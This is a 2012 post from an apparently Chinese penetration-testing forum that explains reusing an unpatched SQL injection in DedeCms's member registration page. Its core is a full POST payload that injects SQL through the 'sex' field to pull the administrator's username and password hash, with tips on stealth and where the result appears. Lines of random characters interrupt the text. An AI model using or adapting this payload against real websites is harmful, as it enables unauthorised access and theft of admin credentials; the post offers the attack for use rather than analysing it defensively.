中国网络渗透测试联盟
标题:
DedeCms SQL注射漏洞再利用
[打印本页]
作者:
admin
时间:
2012-12-5 10:03
标题:
DedeCms SQL注射漏洞再利用
dedecms版本 20121122
) E% K. D. ]4 m
# K' v# i9 K) P, P
需要magic_quotes_gpc=Off
. h8 ]/ C+ R/ l9 {2 V( p- |5 a9 Q
! G3 e0 A) \0 C# O7 P x
应该是没有什么大危害的漏洞.
' f( _ Z7 ?; ?
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
( k# {' c+ }9 ~! j, H' g: e$ J# c
4 z* T6 @$ D' [: K2 J
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
+ G8 d! {+ W& ^+ j
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
) T1 S: K) I" @2 Y3 A
/ D2 M9 U- e6 G, g& V, q
http:///de/member/reg_new.php
% x: u; {/ v6 f
7 ?' x Q g& @8 c! ~# N
POST
, l4 j' ^% M6 b! ?/ h4 S3 P+ N
5 Y2 f0 z/ ~% T, `/ I2 u
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
4 M( w# z) t" c$ Q5 f- C) D
8 _1 z( j8 ~+ G" M- [# r
成功注册后,头像处里面有好玩的信息.
1 V" c$ a7 m* b8 u, D& q
- j) |0 q& I- L. H+ X( t' r5 `
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2